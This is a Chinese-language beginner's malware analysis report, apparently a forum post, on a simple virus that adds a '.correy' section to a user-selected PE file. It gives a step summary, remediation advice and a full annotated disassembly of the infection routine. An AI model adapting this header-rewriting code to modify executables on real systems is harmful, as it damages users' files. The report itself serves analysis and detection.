发布于2022年11月8日3年前 菜鸟的病毒分析基本信息 报告名称:简单pe添加节病毒分析 作者: 报告更新日期: 2012.07.08 样本发现日期: 样本类型: 样本文件大小/被感染文件变化长度: 样本文件MD5 校验值: 样本文件SHA1 校验值: 壳信息: 可能受到威胁的系统: Microsoft Windows NT 4.0Microsoft Windows NT 4.0 Terminal Services EditionMicrosoft Windows 2000Microsoft Windows XPMicrosoft Windows Server 2003Microsoft Windows vistaMicrosoft Windows 7 相关漏洞: 已知检测名称: 简介pe文件感染病毒 被感染系统及网络症状 文件系统变化伪装的windows对话框 用户选择的文件将被修改 注册表变化 详细分析/功能介绍1.程序运行后弹出选择文件的对话框2.选择完毕,程序获取文件路径,打开文件创建映射3.获取入口地址,头的大小,节的数量,对齐粒度等信息4.判断能否直接添加一个节,如果不能则先处理节表后面的数据5.添加一个节,写入节的相关信息6.改写pe文件大小,节的数量7.关闭结束进程 预防及修复措施运行程序前查看程序是否安全,安装杀软;排查时可检查节表最后一个节的节名是否为".correy ",该节名是本样本的感染标志 技术热点及总结对于我这个菜鸟来说还是有很多值得学习的地方,伪装UI的api,getopenfilename以及结构LPOPENFILENAMEgetopenfilename该函数创建一个Open公共对话框,使用户指定驱动器、目录和文件名、或使用户打开文件。如果用户指定了一个文件名,点击OK按钮,返回值为非零。由OPENFILENAME结构的lpstrFile成员指向的缓冲区含有全路径和用户指定的文件名。如果用户取消或关闭Open对话框或错误出现,返回值为零。OPENFILENAME结构包含了GetOpenFileName和GetSaveFileName函数用来初始化打开或另存为对话框的信息。在用户关闭对话框后,系统返回关于用户的选择信息到这个结构中。 在程序中不仅要获得映射后的数据地址还要获得相对偏移,因为在写文件前移动指针的时候这个很重要。反汇编代码: 返回对齐大小的函数.text:00401000 ; Attributes: bp-based frame.text:00401000.text:00401000 sub_401000 proc near ; CODE XREF: start+2F7p.text:00401000 ; start+32Bp ....text:00401000.text:00401000 arg_0 = dword ptr 8.text:00401000 arg_4 = dword ptr 0Ch.text:00401000.text:00401000 push ebp.text:00401001 mov ebp, esp.text:00401003 push edx.text:00401004 mov eax, [ebp+arg_0].text:00401007 xor edx, edx.text:00401009 div [ebp+arg_4].text:0040100C cmp edx, 0.text:0040100F jz short loc_401012.text:00401011 inc eax.text:00401012.text:00401012 loc_401012: ; CODE XREF: sub_401000+Fj.text:00401012 mul [ebp+arg_4].text:00401015 pop edx.text:00401016 leave.text:00401017 retn 8.text:00401017 sub_401000 endp.text:00401017入口函数伪装ui.text:0040101A.text:0040101A public start.text:0040101A start proc near.text:0040101A mov OpenFileNAme.lStructSize, 4Ch.text:00401024 mov OpenFileNAme.lpstrFilter, offset aPeFile_exe_dll ; "pe File (*.exe, *.dll)".text:0040102E mov OpenFileNAme.lpstrFile, offset NumberOfBytesWritten.text:00401038 mov OpenFileNAme.nMaxFile, 200h 
; lpfile返回用户的选择信息 即被选择的文件路径.text:00401042 mov OpenFileNAme.Flags, 281804h.text:0040104C push offset OpenFileNAme ; LPOPENFILENAMEA.text:00401051 call GetOpenFileNameA ; 创建open公共对话框打开文件创建映射.text:00401056 push 0 ; hTemplateFile.text:00401058 push 80h ; dwFlagsAndAttributes.text:0040105D push 3 ; dwCreationDisposition.text:0040105F push 0 ; lpSecurityAttributes.text:00401061 push 3 ; dwShareMode.text:00401063 push 0C0000000h ; dwDesiredAccess.text:00401068 push offset NumberOfBytesWritten ; lpFileName.text:0040106D call CreateFileA ; 打开选择的文件.text:00401072 mov hFile, eax.text:00401077 push 0 ; lpName.text:00401079 push 0 ; dwMaximumSizeLow.text:0040107B push 0 ; dwMaximumSizeHigh.text:0040107D push 2 ; flProtect.text:0040107F push 0 ; lpFileMappingAttributes.text:00401081 push eax ; hFile.text:00401082 call CreateFileMappingA.text:00401087 push 0 ; dwNumberOfBytesToMap.text:00401089 push 0 ; dwFileOffsetLow.text:0040108B push 0 ; dwFileOffsetHigh.text:0040108D push 4 ; dwDesiredAccess.text:0040108F push eax ; hFileMappingObject.text:00401090 call MapViewOfFile.text:00401095 mov map_address, eax ; 创建文件映像 返回映射地址获取pe文件信息.text:0040109A mov esi, map_address.text:004010A0 add esi, 3Ch.text:004010A3 mov esi, [esi].text:004010A5 mov peheader_rva, esi.text:004010AB mov eax, map_address.text:004010B0 add esi, eax.text:004010B2 mov peheader, esi.text:004010B8 mov esi, peheader.text:004010BE add esi, 6.text:004010C1 mov dx, [esi].text:004010C4 movsx edx, dx.text:004010C7 mov section_number, edx.text:004010CD mov esi, peheader.text:004010D3 add esi, 18h.text:004010D6 mov option_header, esi.text:004010DC mov esi, peheader.text:004010E2 add esi, 14h.text:004010E5 mov dx, [esi].text:004010E8 movsx edx, dx.text:004010EB mov sizeof_optionheader, edx.text:004010F1 mov esi, peheader.text:004010F7 add esi, 54h.text:004010FA mov esi, [esi].text:004010FC mov check_sum, esi.text:00401102 mov eax, map_address.text:00401107 add eax, check_sum.text:0040110D mov map_address_csum, 
eax.text:00401112 mov esi, peheader.text:00401118 add esi, 38h.text:0040111B mov esi, [esi].text:0040111D mov sectionalign, esi.text:00401123 mov esi, peheader.text:00401129 add esi, 3Ch.text:0040112C mov esi, [esi].text:0040112E mov filealign, esi.text:00401134 mov esi, option_header.text:0040113A add esi, sizeof_optionheader.text:00401140 mov sectiontable, esi.text:00401146 mov eax, 28h.text:0040114B mov ebx, section_number.text:00401151 mul ebx.text:00401153 add eax, sectiontable.text:00401159 mov sectionbackadress, eax ; 节的尾部地址.text:0040115E sub eax, map_address.text:00401164 mov lDistanceToMove, eax ; 相对偏移.text:00401169 mov eax, sectionbackadress.text:0040116E sub eax, 28h.text:00401171 mov esi, eax.text:00401173 lea edi, a_correy ; ".correy ".text:00401179 mov ecx, 8.text:0040117E repe cmpsb感染标志最后一个节的名字.text:00401180 jz loc_401528 ; 比较最后一个节的名字,是否为。correy.text:00401180 ; 如果是结束.text:00401186 lea esi, OpenFileNAme.pvReserved.text:0040118C mov eax, map_address.text:00401191 add eax, lDistanceToMove.text:00401197 mov edi, eax.text:00401199 mov ecx, 28h.text:0040119E repe cmpsb ; 比较新节位置是否符合要求.text:004011A0 jz loc_401278 ; 符合要求 添加节处理节表尾数据.text:004011A6 mov eax, check_sum ; 不符合要求先处理节表后面的数据 在进行添加节.text:004011AB sub eax, lDistanceToMove.text:004011B1 mov chsum_rvalast, eax.text:004011B6 mov ecx, eax.text:004011B8 mov eax, map_address.text:004011BD add eax, check_sum.text:004011C3 mov esi, eax.text:004011C5 lea edi, unk_403278.text:004011CB.text:004011CB loc_4011CB: ; CODE XREF: start+1BBj.text:004011CB dec esi.text:004011CC inc edi.text:004011CD mov bl, [esi].text:004011CF mov [edi], bl.text:004011D1 dec ecx.text:004011D2 cmp ecx, 0.text:004011D5 jnz short loc_4011CB.text:004011D7 mov ecx, 0FFFFFFFFh.text:004011DC lea esi, unk_403278.text:004011E2.text:004011E2 loc_4011E2: ; CODE XREF: start+1CEj.text:004011E2 inc esi.text:004011E3 inc ecx.text:004011E4 mov al, [esi].text:004011E6 cmp al, 0.text:004011E8 jz short loc_4011E2.text:004011EA cmp ecx, 28h.text:004011ED jb 
loc_40153A.text:004011F3 mov dword_403ABA, ecx.text:004011F9 mov eax, chsum_rvalast.text:004011FE sub eax, ecx.text:00401200 mov nNumberOfBytesToWrite, eax.text:00401205 mov ecx, chsum_rvalast.text:0040120B inc ecx.text:0040120C mov eax, map_address.text:00401211 add eax, lDistanceToMove.text:00401217 mov esi, eax.text:00401219 lea edi, unk_40367B.text:0040121F dec esi.text:00401220 dec edi.text:00401221.text:00401221 loc_401221: ; CODE XREF: start+211j.text:00401221 inc esi.text:00401222 inc edi.text:00401223 mov bl, [esi].text:00401225 mov [edi], bl.text:00401227 dec ecx.text:00401228 cmp ecx, 0.text:0040122B jnz short loc_401221.text:0040122D push 0 ; dwMoveMethod.text:0040122F push 0 ; lpDistanceToMoveHigh.text:00401231 push lDistanceToMove ; lDistanceToMove.text:00401237 push hFile ; hFile.text:0040123D call SetFilePointer.text:00401242 push 0 ; lpOverlapped.text:00401244 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:00401249 push 28h ; nNumberOfBytesToWrite.text:0040124B push offset unk_403150 ; lpBuffer.text:00401250 push hFile ; hFile.text:00401256 call WriteFile.text:0040125B push 0 ; lpOverlapped.text:0040125D push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:00401262 push nNumberOfBytesToWrite ; nNumberOfBytesToWrite.text:00401268 push offset unk_40367B ; lpBuffer.text:0040126D push hFile ; hFile.text:00401273 call WriteFile.text:00401278.text:00401278 loc_401278: ; CODE XREF: start+186j添加节头.text:00401278 mov eax, peheader_rva.text:0040127D add eax, 6.text:00401280 push 0 ; dwMoveMethod.text:00401282 push 0 ; lpDistanceToMoveHigh.text:00401284 push eax ; lDistanceToMove.text:00401285 push hFile ; hFile.text:0040128B call SetFilePointer.text:00401290 inc section_number.text:00401296 push 0 ; lpOverlapped.text:00401298 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:0040129D push 2 ; nNumberOfBytesToWrite.text:0040129F push offset section_number ; lpBuffer.text:004012A4 push hFile ; hFile.text:004012AA call 
WriteFile ; 更改节的数量加1.text:004012AF push 0 ; dwMoveMethod.text:004012B1 push 0 ; lpDistanceToMoveHigh.text:004012B3 push lDistanceToMove ; lDistanceToMove.text:004012B9 push hFile ; hFile.text:004012BF call SetFilePointer ; 指针移动到新的节准备写数据.text:004012C4 push 0 ; lpOverlapped.text:004012C6 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004012CB push 8 ; nNumberOfBytesToWrite.text:004012CD push offset a_correy ; ".correy ".text:004012D2 push hFile ; hFile.text:004012D8 call WriteFile ; 写入前节名.text:004012DD push offset String ; "made by correy QQ:112426112 Email:legua"....text:004012E2 call lstrlenA.text:004012E7 mov nNumberOfBytesToWrite, eax.text:004012EC push 0 ; lpOverlapped.text:004012EE push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004012F3 push 4 ; nNumberOfBytesToWrite.text:004012F5 push offset nNumberOfBytesToWrite ; lpBuffer.text:004012FA push hFile ; hFile.text:00401300 call WriteFile ; 写入上面的数据大小 即节的大小.text:00401305 push sectionalign.text:0040130B push nNumberOfBytesToWrite.text:00401311 call sub_401000 ; 返回对其大小.text:00401316 mov dword_403AD2, eax.text:0040131B mov eax, sectionbackadress.text:00401320 sub eax, 1Ch.text:00401323 mov eax, [eax].text:00401325 mov dword_403ABA, eax.text:0040132A mov eax, sectionbackadress.text:0040132F sub eax, 20h.text:00401332 mov eax, [eax].text:00401334 mov nNumberOfBytesToWrite, eax.text:00401339 push sectionalign.text:0040133F push nNumberOfBytesToWrite.text:00401345 call sub_401000 ; 返回对其大小.text:0040134A add eax, dword_403ABA.text:00401350 mov dword_403ABA, eax.text:00401355 push 0 ; lpOverlapped.text:00401357 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:0040135C push 4 ; nNumberOfBytesToWrite.text:0040135E push offset dword_403ABA ; lpBuffer.text:00401363 push hFile ; hFile.text:00401369 call WriteFile ; 计算对其内存大小 并写入数据.text:0040136E push filealign.text:00401374 push nNumberOfBytesToWrite.text:0040137A call sub_401000 ; 返回对其大小.text:0040137F mov dword_403AC6, 
eax.text:00401384 push 0 ; lpOverlapped.text:00401386 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:0040138B push 4 ; nNumberOfBytesToWrite.text:0040138D push offset dword_403AC6 ; lpBuffer.text:00401392 push hFile ; hFile.text:00401398 call WriteFile.text:0040139D mov eax, sectionbackadress.text:004013A2 sub eax, 14h.text:004013A5 mov eax, [eax].text:004013A7 mov nNumberOfBytesToWrite, eax.text:004013AC mov eax, sectionbackadress.text:004013B1 sub eax, 18h.text:004013B4 mov eax, [eax].text:004013B6 add eax, nNumberOfBytesToWrite.text:004013BC mov dword_403AC2, eax.text:004013C1 push 0 ; lpOverlapped.text:004013C3 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004013C8 push 4 ; nNumberOfBytesToWrite.text:004013CA push offset dword_403AC2 ; lpBuffer.text:004013CF push hFile ; hFile.text:004013D5 call WriteFile ; 写入磁盘偏移.text:004013DA mov eax, lDistanceToMove.text:004013DF add eax, 24h.text:004013E2 push 0 ; dwMoveMethod.text:004013E4 push 0 ; lpDistanceToMoveHigh.text:004013E6 push eax ; lDistanceToMove.text:004013E7 push hFile ; hFile.text:004013ED call SetFilePointer.text:004013F2 push 0 ; lpOverlapped.text:004013F4 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004013F9 push 4 ; nNumberOfBytesToWrite.text:004013FB push offset asc_403082 ; " ".text:00401400 push hFile ; hFile.text:00401406 call WriteFile ; 写入节的属性.text:0040140B mov eax, peheader.text:00401410 add eax, 1Ch.text:00401413 mov eax, [eax].text:00401415 add eax, dword_403AC6.text:0040141B mov newfilesize, eax.text:00401420 mov ebx, peheader_rva.text:00401426 add ebx, 1Ch.text:00401429 push 0 ; dwMoveMethod.text:0040142B push 0 ; lpDistanceToMoveHigh.text:0040142D push ebx ; lDistanceToMove.text:0040142E push hFile ; hFile.text:00401434 call SetFilePointer.text:00401439 push 0 ; lpOverlapped.text:0040143B push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:00401440 push 4 ; nNumberOfBytesToWrite.text:00401442 push offset newfilesize ; 
lpBuffer.text:00401447 push hFile ; hFile.text:0040144D call WriteFile ; 改写新的文件大小.text:00401452 mov eax, peheader.text:00401457 add eax, 50h.text:0040145A mov eax, [eax].text:0040145C add eax, dword_403AD2.text:00401462 mov dword_403ACE, eax.text:00401467 mov ebx, peheader_rva.text:0040146D add ebx, 50h.text:00401470 push 0 ; dwMoveMethod.text:00401472 push 0 ; lpDistanceToMoveHigh.text:00401474 push ebx ; lDistanceToMove.text:00401475 push hFile ; hFile.text:0040147B call SetFilePointer.text:00401480 push 0 ; lpOverlapped.text:00401482 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:00401487 push 4 ; nNumberOfBytesToWrite.text:00401489 push offset dword_403ACE ; lpBuffer.text:0040148E push hFile ; hFile.text:00401494 call WriteFile ; 修改sizeofheader.text:00401499 push 0 ; dwMoveMethod.text:0040149B push 0 ; lpDistanceToMoveHigh.text:0040149D push dword_403AC2 ; lDistanceToMove.text:004014A3 push hFile ; hFile写文件.text:004014A9 call SetFilePointer.text:004014AE push 0 ; lpOverlapped.text:004014B0 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004014B5 push 55h ; nNumberOfBytesToWrite.text:004014B7 push offset String ; "made by correy QQ:112426112 Email:legua"....text:004014BC push hFile ; hFile.text:004014C2 call WriteFile.text:004014C7 mov eax, dword_403AC6.text:004014CC add eax, dword_403AC2.text:004014D2 push eax.text:004014D3 push 0 ; dwMoveMethod.text:004014D5 push 0 ; lpDistanceToMoveHigh.text:004014D7 push eax ; lDistanceToMove.text:004014D8 push hFile ; hFile.text:004014DE call SetFilePointer.text:004014E3 pop eax.text:004014E4 sub eax, 55h.text:004014E7 push 0 ; dwMoveMethod.text:004014E9 push 0 ; lpDistanceToMoveHigh.text:004014EB push eax ; lDistanceToMove.text:004014EC push hFile ; hFile.text:004014F2 call SetFilePointer.text:004014F7 push 0 ; lpOverlapped.text:004014F9 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004014FE push 55h ; nNumberOfBytesToWrite.text:00401500 push offset String ; "made by correy 
QQ:112426112 Email:legua"....text:00401505 push hFile ; hFile.text:0040150B call WriteFile ; 写文件.text:00401510 push hFile ; hFile.text:00401516 call FlushFileBuffers.text:0040151B push hFile ; hObject.text:00401521 call CloseHandle.text:00401526 jmp short loc_40154A.text:00401528 ; ---------------------------------------------------------------------------.text:00401528.text:00401528 loc_401528: ; CODE XREF: start+166j.text:00401528 push 0 ; uType.text:0040152A push 0 ; lpCaption.text:0040152C push offset Text ; "文?.text:00401531 push 0 ; hWnd.text:00401533 call MessageBoxA.text:00401538 jmp short loc_40154A.text:0040153A ; ---------------------------------------------------------------------------.text:0040153A.text:0040153A loc_40153A: ; CODE XREF: start+1D3j.text:0040153A push 0 ; uType.text:0040153C push 0 ; lpCaption.text:0040153E push offset asc_403086 ; "节头?.text:00401543 push 0 ; hWnd.text:00401545 call MessageBoxA.text:0040154A.text:0040154A loc_40154A: ; CODE XREF: start+50Cj.text:0040154A ; start+51Ej.text:0040154A push 0 ; uExitCode.text:0040154C call ExitProcess.text:0040154C start endp